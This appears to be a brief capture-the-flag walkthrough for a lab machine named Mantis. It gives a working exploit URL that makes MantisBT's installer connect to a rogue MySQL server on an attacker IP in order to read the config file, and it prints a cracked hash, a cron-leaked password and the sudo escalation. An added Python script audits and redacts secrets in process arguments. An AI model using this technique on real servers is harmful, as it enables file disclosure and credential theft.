Mantis 🔸
Enumeration
The web server shows a template landing page; feroxbuster discovers a /bugtracker path.
Searching for an exploit, we find https://mantisbt.org/bugs/view.php?id=23173
Initial Access
We start the rogue server from https://github.com/allyshka/Rogue-MySql-Server
Visit http://192.168.169.204/bugtracker/admin/install.php?install=3&hostname=192.168.45.206
After seeing the config_inc.php file in the Mantis repo, we can read it from the target.
We have the database credentials
c7870d0b102cfb2f4916ff04e47b5c6f
Using hashcat
https://mantisbt.org/bugs/view.php?id=26091
Get the flag
Privilege Escalation
We see a backup script but can't view its contents; there is a cron job.
Using pspy64
We see the password BugTracker007
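pspy prints the command lines of running processes, which Linux exposes in /proc/<pid>/cmdline, so a password passed as an argument by a cron job is visible to every local user. The audit script below is an added example, not part of the original notes: it flags and redacts secrets in process arguments, and the sample command, tool list and function names are assumptions (the notes do not show the actual cron command).

```python
import os
import re
import shlex

SHELLS = {"sh", "bash", "dash"}
MYSQL_FAMILY = {"mysql", "mysqldump", "mysqladmin", "mariadb", "mariadb-dump"}  # assumed list
LONG_OPT = re.compile(r"--(password|passwd|pass|pwd)=.+", re.I)
ASSIGN = re.compile(r"\w*(PASSWORD|PASSWD|SECRET|TOKEN)\w*=.+", re.I)

# Constructed sample: how a cron-launched job appears in /proc/<pid>/cmdline.
SAMPLE = ["/bin/sh", "-c", "mysqldump -u backup -pExamplePass123 bugtracker > /tmp/b.sql"]

def tokens(argv):
    """Flatten argv, also splitting a command string handed to a shell via -c."""
    out = list(argv[:1])
    shell = bool(argv) and os.path.basename(argv[0]) in SHELLS
    for prev, arg in zip(argv, argv[1:]):
        out.extend(shlex.split(arg) if shell and prev == "-c" else [arg])
    return out

def find_argv_secrets(argv):
    """Return (redacted command line, reasons); reasons is empty if nothing is exposed."""
    toks, reasons, seen = tokens(argv), [], set()
    for i, tok in enumerate(toks):
        if LONG_OPT.fullmatch(tok) or ASSIGN.fullmatch(tok):
            reasons.append("secret in --password=/VAR=value argument")
        elif seen & MYSQL_FAMILY and re.fullmatch(r"-p.+", tok):
            reasons.append("mysql-style -p<password>")
        elif i and toks[i - 1] == "-p" and "sshpass" in seen:
            reasons.append("sshpass -p <password>")
        else:
            seen.add(os.path.basename(tok))  # remember tool names seen so far
            continue
        toks[i] = "<redacted>"  # never copy the secret into the report
    return " ".join(toks), reasons

def scan_proc(proc="/proc"):
    """Audit live processes via cmdline files, which are world-readable by default."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, pid, "cmdline"), "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            line, reasons = find_argv_secrets(argv)
        except (OSError, ValueError):
            continue  # process exited, or a shell string shlex cannot parse
        if reasons:
            findings[int(pid)] = (line, reasons)
    return findings
```

Run `scan_proc()` repeatedly around the cron schedule, since short-lived jobs only appear while they execute. Moving the credential into an option file readable only by its owner, or mounting /proc with `hidepid=2`, removes this exposure.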
sudo -l shows that mantis has full privs so
Post Exploitation
Get the flag